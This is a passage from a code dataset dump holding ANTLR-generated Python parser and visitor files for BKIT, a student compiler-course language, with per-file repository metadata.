MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def STAR_INT(self):\n return self.getToken(BKITParser.STAR_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr1\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr1\" ):\n return visitor.visitExpr1(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def expr1(self):\n\n localctx = BKITParser.Expr1Context(self, self._ctx, self.state)\n self.enterRule(localctx, 24, self.RULE_expr1)\n self._la = 0 # Token type\n try:\n self.state = 125\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,11,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 120\n self.expr2(0)\n self.state = 121\n _la = self._input.LA(1)\n if not(_la==BKITParser.MINUS_INT or _la==BKITParser.STAR_INT):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 122\n self.expr1()\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 124\n self.expr2(0)\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Expr2Context(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def operand(self):\n return self.getTypedRuleContext(BKITParser.OperandContext,0)\n\n\n def expr2(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Expr2Context)\n else:\n return self.getTypedRuleContext(BKITParser.Expr2Context,i)\n\n\n def DIV_INT(self):\n return self.getToken(BKITParser.DIV_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_expr2\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitExpr2\" ):\n return visitor.visitExpr2(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n def expr2(self, _p:int=0):\n _parentctx = self._ctx\n _parentState = self.state\n localctx = BKITParser.Expr2Context(self, self._ctx, _parentState)\n _prevctx = localctx\n _startState = 26\n self.enterRecursionRule(localctx, 26, self.RULE_expr2, _p)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 128\n self.operand()\n self._ctx.stop = self._input.LT(-1)\n self.state = 135\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,12,self._ctx)\n while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:\n if _alt==1:\n if self._parseListeners is not None:\n self.triggerExitRuleEvent()\n _prevctx = localctx\n localctx = BKITParser.Expr2Context(self, _parentctx, _parentState)\n self.pushNewRecursionContext(localctx, _startState, self.RULE_expr2)\n self.state = 130\n if not self.precpred(self._ctx, 2):\n from antlr4.error.Errors import FailedPredicateException\n raise FailedPredicateException(self, \"self.precpred(self._ctx, 2)\")\n self.state = 131\n self.match(BKITParser.DIV_INT)\n self.state = 132\n self.expr2(3) \n self.state = 137\n self._errHandler.sync(self)\n _alt = self._interp.adaptivePredict(self._input,12,self._ctx)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.unrollRecursionContexts(_parentctx)\n return localctx\n\n\n class OperandContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def Integer_literal(self):\n return self.getToken(BKITParser.Integer_literal, 0)\n\n def Float_literal(self):\n return self.getToken(BKITParser.Float_literal, 0)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def call_stmt(self):\n return self.getTypedRuleContext(BKITParser.Call_stmtContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_operand\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitOperand\" ):\n return visitor.visitOperand(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def operand(self):\n\n localctx = BKITParser.OperandContext(self, self._ctx, self.state)\n self.enterRule(localctx, 28, self.RULE_operand)\n try:\n self.state = 142\n self._errHandler.sync(self)\n la_ = self._interp.adaptivePredict(self._input,13,self._ctx)\n if la_ == 1:\n self.enterOuterAlt(localctx, 1)\n self.state = 138\n self.match(BKITParser.Integer_literal)\n pass\n\n elif la_ == 2:\n self.enterOuterAlt(localctx, 2)\n self.state = 139\n self.match(BKITParser.Float_literal)\n pass\n\n elif la_ == 3:\n self.enterOuterAlt(localctx, 3)\n self.state = 140\n self.match(BKITParser.ID)\n pass\n\n elif la_ == 4:\n self.enterOuterAlt(localctx, 4)\n self.state = 141\n self.call_stmt()\n pass\n\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Ids_listContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def ID(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.ID)\n else:\n return self.getToken(BKITParser.ID, i)\n\n def COMMA(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COMMA)\n else:\n return self.getToken(BKITParser.COMMA, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_ids_list\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitIds_list\" ):\n return visitor.visitIds_list(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def ids_list(self):\n\n localctx = BKITParser.Ids_listContext(self, self._ctx, self.state)\n self.enterRule(localctx, 30, self.RULE_ids_list)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 144\n self.match(BKITParser.ID)\n self.state = 149\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while _la==BKITParser.COMMA:\n self.state = 145\n self.match(BKITParser.COMMA)\n self.state = 146\n self.match(BKITParser.ID)\n self.state = 151\n self._errHandler.sync(self)\n _la = self._input.LA(1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_typeContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def INT(self):\n return self.getToken(BKITParser.INT, 0)\n\n def FLOAT(self):\n return self.getToken(BKITParser.FLOAT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_type\n\n def accept(self, visitor:ParseTreeVisitor):\n if hasattr( visitor, \"visitPrimitive_type\" ):\n return visitor.visitPrimitive_type(self)\n else:\n return visitor.visitChildren(self)\n\n\n\n\n def primitive_type(self):\n\n localctx = BKITParser.Primitive_typeContext(self, self._ctx, self.state)\n self.enterRule(localctx, 32, self.RULE_primitive_type)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 152\n _la = self._input.LA(1)\n if not(_la==BKITParser.INT or _la==BKITParser.FLOAT):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n def sempred(self, localctx:RuleContext, ruleIndex:int, predIndex:int):\n if self._predicates == None:\n self._predicates = dict()\n self._predicates[13] = self.expr2_sempred\n pred = self._predicates.get(ruleIndex, None)\n if pred is None:\n raise Exception(\"No predicate with index:\" + str(ruleIndex))\n else:\n return pred(localctx, predIndex)\n\n def expr2_sempred(self, localctx:Expr2Context, predIndex:int):\n if predIndex == 0:\n return self.precpred(self._ctx, 2)\n \n\n\n\n\n" }, { "alpha_fraction": 0.5010992288589478, "alphanum_fraction": 0.5517999529838562, "avg_line_length": 30.759824752807617, "blob_id": "97d9c1d47c00167fcdf3bb8b41ba16ee3139f7bd", "content_id": "fccfa73bafff1d282b2ae0f72d72f58eb65cbeb4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7278, "license_type": "no_license", "max_line_length": 113, "num_lines": 229, "path": "/LexicalAnalysis/src/main/bkit/parser/.antlr/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/LexicalAnalysis/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3\\22\")\n buf.write(\"\\35\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\3\\2\\3\\2\\3\\2\\3\\3\\6\\3\\r\\n\\3\")\n buf.write(\"\\r\\3\\16\\3\\16\\3\\4\\6\\4\\22\\n\\4\\r\\4\\16\\4\\23\\3\\4\\6\\4\\27\\n\\4\")\n buf.write(\"\\r\\4\\16\\4\\30\\3\\4\\3\\4\\3\\4\\2\\2\\5\\2\\4\\6\\2\\3\\3\\2\\5\\6\\2\\34\")\n buf.write(\"\\2\\b\\3\\2\\2\\2\\4\\f\\3\\2\\2\\2\\6\\21\\3\\2\\2\\2\\b\\t\\7\\4\\2\\2\\t\\n\")\n buf.write(\"\\7\\2\\2\\3\\n\\3\\3\\2\\2\\2\\13\\r\\t\\2\\2\\2\\f\\13\\3\\2\\2\\2\\r\\16\\3\")\n buf.write(\"\\2\\2\\2\\16\\f\\3\\2\\2\\2\\16\\17\\3\\2\\2\\2\\17\\5\\3\\2\\2\\2\\20\\22\\7\")\n buf.write(\"\\3\\2\\2\\21\\20\\3\\2\\2\\2\\22\\23\\3\\2\\2\\2\\23\\21\\3\\2\\2\\2\\23\\24\")\n buf.write(\"\\3\\2\\2\\2\\24\\26\\3\\2\\2\\2\\25\\27\\7\\7\\2\\2\\26\\25\\3\\2\\2\\2\\27\")\n buf.write(\"\\30\\3\\2\\2\\2\\30\\26\\3\\2\\2\\2\\30\\31\\3\\2\\2\\2\\31\\32\\3\\2\\2\\2\")\n buf.write(\"\\32\\33\\7\\3\\2\\2\\33\\7\\3\\2\\2\\2\\5\\16\\23\\30\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"'\\\"'\" ]\n\n symbolicNames = [ \"<INVALID>\", \"<INVALID>\", \"VAR\", \"Real_number\", \"Integer_number\", \n \"String\", \"HEXADECIMAL\", \"DECIMAL\", \"OCTAL\", \"LETTER\", \n \"ID\", \"ILLEGAL_ESCAPE\", \"WS\", \"UNCLOSE_STRING\", \"ERROR_CHAR\", \n \"BLOCK_COMMENT\", \"UNTERMINATED_COMMENT\" ]\n\n RULE_program = 0\n RULE_number = 1\n RULE_string = 2\n\n ruleNames = [ \"program\", \"number\", \"string\" ]\n\n EOF = Token.EOF\n T__0=1\n VAR=2\n Real_number=3\n Integer_number=4\n String=5\n HEXADECIMAL=6\n DECIMAL=7\n OCTAL=8\n LETTER=9\n ID=10\n ILLEGAL_ESCAPE=11\n WS=12\n UNCLOSE_STRING=13\n ERROR_CHAR=14\n BLOCK_COMMENT=15\n UNTERMINATED_COMMENT=16\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def VAR(self):\n return self.getToken(BKITParser.VAR, 0)\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 6\n self.match(BKITParser.VAR)\n self.state = 7\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class NumberContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def Real_number(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.Real_number)\n else:\n return self.getToken(BKITParser.Real_number, i)\n\n def Integer_number(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.Integer_number)\n else:\n return self.getToken(BKITParser.Integer_number, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_number\n\n\n\n\n def number(self):\n\n localctx = BKITParser.NumberContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_number)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 10 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 9\n _la = self._input.LA(1)\n if not(_la==BKITParser.Real_number or _la==BKITParser.Integer_number):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n self.state = 12 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.Real_number or _la==BKITParser.Integer_number):\n break\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class StringContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def String(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.String)\n else:\n return self.getToken(BKITParser.String, i)\n\n def getRuleIndex(self):\n return BKITParser.RULE_string\n\n\n\n\n def string(self):\n\n localctx = BKITParser.StringContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_string)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 15 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 14\n self.match(BKITParser.T__0)\n self.state = 17 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.T__0):\n break\n\n self.state = 20 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 19\n self.match(BKITParser.String)\n self.state = 22 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.String):\n break\n\n self.state = 24\n self.match(BKITParser.T__0)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n\n\n" }, { "alpha_fraction": 0.7233632802963257, "alphanum_fraction": 0.7275353074073792, "avg_line_length": 30.806121826171875, "blob_id": "dab7398bec80fb92b804d5efe81664dbcf76a8b2", "content_id": "ad9b87df206c9e6f00b7744cc88f35f4764fa2f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3116, "license_type": "no_license", "max_line_length": 88, "num_lines": 98, "path": "/SyntaxAnalysis/tut/target/main/bkit/parser/BKITVisitor.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nif __name__ is not None and \".\" in __name__:\n from .BKITParser import BKITParser\nelse:\n from BKITParser import BKITParser\n\n# This class defines a complete generic visitor for a parse tree produced by BKITParser.\n\nclass BKITVisitor(ParseTreeVisitor):\n\n # Visit a parse tree produced by BKITParser#program.\n def visitProgram(self, ctx:BKITParser.ProgramContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#var_declare.\n def visitVar_declare(self, ctx:BKITParser.Var_declareContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#function_declare.\n def visitFunction_declare(self, ctx:BKITParser.Function_declareContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#function_body.\n def visitFunction_body(self, ctx:BKITParser.Function_bodyContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#ids_list_with_type.\n def visitIds_list_with_type(self, ctx:BKITParser.Ids_list_with_typeContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#stmt.\n def visitStmt(self, ctx:BKITParser.StmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#assign_stmt.\n def visitAssign_stmt(self, ctx:BKITParser.Assign_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#call_stmt.\n def visitCall_stmt(self, ctx:BKITParser.Call_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#ret_stmt.\n def visitRet_stmt(self, ctx:BKITParser.Ret_stmtContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr.\n def visitExpr(self, ctx:BKITParser.ExprContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#subexpr.\n def visitSubexpr(self, ctx:BKITParser.SubexprContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr0.\n def visitExpr0(self, ctx:BKITParser.Expr0Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr1.\n def visitExpr1(self, ctx:BKITParser.Expr1Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#expr2.\n def visitExpr2(self, ctx:BKITParser.Expr2Context):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#operand.\n def visitOperand(self, ctx:BKITParser.OperandContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#ids_list.\n def visitIds_list(self, ctx:BKITParser.Ids_listContext):\n return self.visitChildren(ctx)\n\n\n # Visit a parse tree produced by BKITParser#primitive_type.\n def visitPrimitive_type(self, ctx:BKITParser.Primitive_typeContext):\n return self.visitChildren(ctx)\n\n\n\ndel BKITParser" }, { "alpha_fraction": 0.49288564920425415, "alphanum_fraction": 0.5542108416557312, "avg_line_length": 34.244293212890625, "blob_id": "17f640b06414f57e9c6ee00f09878e98374d8b13", "content_id": "e3cc40208650ad6c2bc5ff2695948dd70eae200e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 114276, "license_type": "no_license", "max_line_length": 446, "num_lines": 3242, "path": "/Assignments/assignment1/src/forJava/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3S\")\n buf.write(\"\\u01bb\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\")\n buf.write(\"\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\")\n buf.write(\"\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\\t\\23\")\n buf.write(\"\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\\4\\31\")\n buf.write(\"\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\\t\\36\")\n buf.write(\"\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\\4&\\t\")\n buf.write(\"&\\4\\'\\t\\'\\3\\2\\3\\2\\3\\2\\7\\2R\\n\\2\\f\\2\\16\\2U\\13\\2\\3\\2\\7\\2\")\n buf.write(\"X\\n\\2\\f\\2\\16\\2[\\13\\2\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\")\n buf.write(\"\\4\\3\\4\\3\\4\\3\\4\\5\\4i\\n\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\7\\4p\\n\\4\\f\")\n buf.write(\"\\4\\16\\4s\\13\\4\\3\\4\\7\\4v\\n\\4\\f\\4\\16\\4y\\13\\4\\3\\4\\3\\4\\3\\4\")\n buf.write(\"\\3\\5\\3\\5\\3\\5\\7\\5\\u0081\\n\\5\\f\\5\\16\\5\\u0084\\13\\5\\3\\5\\7\\5\")\n buf.write(\"\\u0087\\n\\5\\f\\5\\16\\5\\u008a\\13\\5\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\")\n buf.write(\"\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\5\")\n buf.write(\"\\6\\u009f\\n\\6\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\3\\7\\7\\7\\u00aa\")\n buf.write(\"\\n\\7\\f\\7\\16\\7\\u00ad\\13\\7\\3\\7\\3\\7\\5\\7\\u00b1\\n\\7\\3\\7\\3\\7\")\n buf.write(\"\\3\\7\\3\\b\\3\\b\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\")\n buf.write(\"\\t\\3\\t\\3\\t\\3\\t\\3\\t\\3\\n\\3\\n\\3\\n\\3\\n\\3\\n\\3\\n\\3\\n\\3\\13\\3\")\n buf.write(\"\\13\\3\\13\\3\\13\\3\\13\\3\\13\\3\\13\\3\\f\\3\\f\\5\\f\\u00d7\\n\\f\\3\\f\")\n buf.write(\"\\3\\f\\3\\f\\3\\r\\3\\r\\3\\16\\3\\16\\3\\17\\3\\17\\3\\17\\3\\17\\3\\17\\7\")\n buf.write(\"\\17\\u00e5\\n\\17\\f\\17\\16\\17\\u00e8\\13\\17\\7\\17\\u00ea\\n\\17\")\n buf.write(\"\\f\\17\\16\\17\\u00ed\\13\\17\\3\\17\\3\\17\\3\\20\\3\\20\\5\\20\\u00f3\")\n buf.write(\"\\n\\20\\3\\21\\3\\21\\3\\21\\3\\21\\3\\21\\5\\21\\u00fa\\n\\21\\3\\22\\3\")\n buf.write(\"\\22\\3\\22\\3\\22\\3\\22\\3\\22\\7\\22\\u0102\\n\\22\\f\\22\\16\\22\\u0105\")\n buf.write(\"\\13\\22\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\3\\23\\7\\23\\u010d\\n\\23\\f\")\n buf.write(\"\\23\\16\\23\\u0110\\13\\23\\3\\24\\3\\24\\3\\24\\3\\24\\3\\24\\3\\24\\7\")\n buf.write(\"\\24\\u0118\\n\\24\\f\\24\\16\\24\\u011b\\13\\24\\3\\25\\3\\25\\3\\25\\5\")\n buf.write(\"\\25\\u0120\\n\\25\\3\\26\\3\\26\\3\\26\\5\\26\\u0125\\n\\26\\3\\27\\3\\27\")\n buf.write(\"\\5\\27\\u0129\\n\\27\\3\\30\\3\\30\\3\\30\\3\\30\\3\\30\\6\\30\\u0130\\n\")\n buf.write(\"\\30\\r\\30\\16\\30\\u0131\\3\\31\\3\\31\\5\\31\\u0136\\n\\31\\3\\32\\3\")\n buf.write(\"\\32\\3\\32\\3\\32\\3\\32\\5\\32\\u013d\\n\\32\\3\\33\\3\\33\\3\\33\\5\\33\")\n buf.write(\"\\u0142\\n\\33\\3\\34\\3\\34\\3\\34\\3\\34\\3\\34\\7\\34\\u0149\\n\\34\\f\")\n buf.write(\"\\34\\16\\34\\u014c\\13\\34\\7\\34\\u014e\\n\\34\\f\\34\\16\\34\\u0151\")\n buf.write(\"\\13\\34\\3\\34\\3\\34\\3\\35\\3\\35\\3\\35\\3\\35\\3\\35\\3\\35\\3\\35\\3\")\n buf.write(\"\\35\\3\\35\\5\\35\\u015e\\n\\35\\3\\36\\3\\36\\3\\36\\3\\36\\3\\37\\3\\37\")\n buf.write(\"\\3 \\3 \\3 \\5 \\u0169\\n \\3 \\3 \\3 \\5 \\u016e\\n \\7 \\u0170\\n\")\n buf.write(\" \\f \\16 \\u0173\\13 \\5 \\u0175\\n \\3 \\3 \\3!\\3!\\5!\\u017b\\n\")\n buf.write(\"!\\3!\\3!\\3!\\5!\\u0180\\n!\\7!\\u0182\\n!\\f!\\16!\\u0185\\13!\\3\")\n buf.write(\"\\\"\\3\\\"\\3\\\"\\3\\\"\\6\\\"\\u018b\\n\\\"\\r\\\"\\16\\\"\\u018c\\3\\\"\\5\\\"\\u0190\")\n buf.write(\"\\n\\\"\\3\\\"\\3\\\"\\3\\\"\\5\\\"\\u0195\\n\\\"\\3#\\3#\\3#\\3#\\6#\\u019b\\n\")\n buf.write(\"#\\r#\\16#\\u019c\\3#\\5#\\u01a0\\n#\\3$\\3$\\3$\\3$\\3$\\6$\\u01a7\")\n buf.write(\"\\n$\\r$\\16$\\u01a8\\3%\\3%\\3%\\3%\\3&\\3&\\3&\\3&\\3\\'\\3\\'\\3\\'\\7\")\n buf.write(\"\\'\\u01b6\\n\\'\\f\\'\\16\\'\\u01b9\\13\\'\\3\\'\\2\\5\\\"$&(\\2\\4\\6\\b\")\n buf.write(\"\\n\\f\\16\\20\\22\\24\\26\\30\\32\\34\\36 \\\"$&(*,.\\60\\62\\64\\668\")\n buf.write(\":<>@BDFHJL\\2\\3\\3\\2\\n\\r\\2\\u01c6\\2S\\3\\2\\2\\2\\4^\\3\\2\\2\\2\\6\")\n buf.write(\"b\\3\\2\\2\\2\\b\\u0082\\3\\2\\2\\2\\n\\u009e\\3\\2\\2\\2\\f\\u00a0\\3\\2\")\n buf.write(\"\\2\\2\\16\\u00b5\\3\\2\\2\\2\\20\\u00b7\\3\\2\\2\\2\\22\\u00c6\\3\\2\\2\")\n buf.write(\"\\2\\24\\u00cd\\3\\2\\2\\2\\26\\u00d6\\3\\2\\2\\2\\30\\u00db\\3\\2\\2\\2\")\n buf.write(\"\\32\\u00dd\\3\\2\\2\\2\\34\\u00df\\3\\2\\2\\2\\36\\u00f0\\3\\2\\2\\2 \\u00f9\")\n buf.write(\"\\3\\2\\2\\2\\\"\\u00fb\\3\\2\\2\\2$\\u0106\\3\\2\\2\\2&\\u0111\\3\\2\\2\\2\")\n buf.write(\"(\\u011f\\3\\2\\2\\2*\\u0124\\3\\2\\2\\2,\\u0128\\3\\2\\2\\2.\\u012a\\3\")\n buf.write(\"\\2\\2\\2\\60\\u0135\\3\\2\\2\\2\\62\\u013c\\3\\2\\2\\2\\64\\u0141\\3\\2\")\n buf.write(\"\\2\\2\\66\\u0143\\3\\2\\2\\28\\u015d\\3\\2\\2\\2:\\u015f\\3\\2\\2\\2<\\u0163\")\n buf.write(\"\\3\\2\\2\\2>\\u0165\\3\\2\\2\\2@\\u017a\\3\\2\\2\\2B\\u018f\\3\\2\\2\\2\")\n buf.write(\"D\\u019f\\3\\2\\2\\2F\\u01a1\\3\\2\\2\\2H\\u01aa\\3\\2\\2\\2J\\u01ae\\3\")\n buf.write(\"\\2\\2\\2L\\u01b2\\3\\2\\2\\2NO\\5\\4\\3\\2OP\\7B\\2\\2PR\\3\\2\\2\\2QN\\3\")\n buf.write(\"\\2\\2\\2RU\\3\\2\\2\\2SQ\\3\\2\\2\\2ST\\3\\2\\2\\2TY\\3\\2\\2\\2US\\3\\2\\2\")\n buf.write(\"\\2VX\\5\\6\\4\\2WV\\3\\2\\2\\2X[\\3\\2\\2\\2YW\\3\\2\\2\\2YZ\\3\\2\\2\\2Z\")\n buf.write(\"\\\\\\3\\2\\2\\2[Y\\3\\2\\2\\2\\\\]\\7\\2\\2\\3]\\3\\3\\2\\2\\2^_\\7\\36\\2\\2\")\n buf.write(\"_`\\7@\\2\\2`a\\5@!\\2a\\5\\3\\2\\2\\2bc\\7\\31\\2\\2cd\\7@\\2\\2dh\\7\\3\")\n buf.write(\"\\2\\2ef\\7\\33\\2\\2fg\\7@\\2\\2gi\\5L\\'\\2he\\3\\2\\2\\2hi\\3\\2\\2\\2\")\n buf.write(\"ij\\3\\2\\2\\2jk\\7\\16\\2\\2kq\\7@\\2\\2lm\\5\\16\\b\\2mn\\7B\\2\\2np\\3\")\n buf.write(\"\\2\\2\\2ol\\3\\2\\2\\2ps\\3\\2\\2\\2qo\\3\\2\\2\\2qr\\3\\2\\2\\2rw\\3\\2\\2\")\n buf.write(\"\\2sq\\3\\2\\2\\2tv\\5\\n\\6\\2ut\\3\\2\\2\\2vy\\3\\2\\2\\2wu\\3\\2\\2\\2w\")\n 